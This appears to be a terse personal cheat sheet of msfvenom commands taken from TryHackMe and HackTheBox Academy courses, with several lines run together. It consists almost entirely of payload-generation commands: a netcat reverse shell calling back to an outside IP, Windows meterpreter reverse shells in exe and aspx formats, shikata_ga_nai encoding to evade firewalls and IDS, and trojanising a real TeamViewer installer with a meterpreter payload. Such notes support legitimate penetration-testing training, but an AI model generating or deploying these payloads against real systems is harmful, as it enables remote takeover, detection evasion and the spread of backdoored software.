Msfvenom
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
#result
mkfifo /tmp/kdyog; nc 10.9.135.209 4444 0</tmp/kdyog | /bin/sh >/tmp/kdyog 2>&1; rm /tmp/kdyog tryhackme - common linux privsec
msfvenom --list=formats
msfvenom -l payloadsmsfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_naimsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perlmsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_naimsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspxmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.9.193.229 LPORT=4444 -f exe -o reverse.exemsfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5hackthebox academy - metasploit (Firewall and IDS/IPS Evasion)
Last updated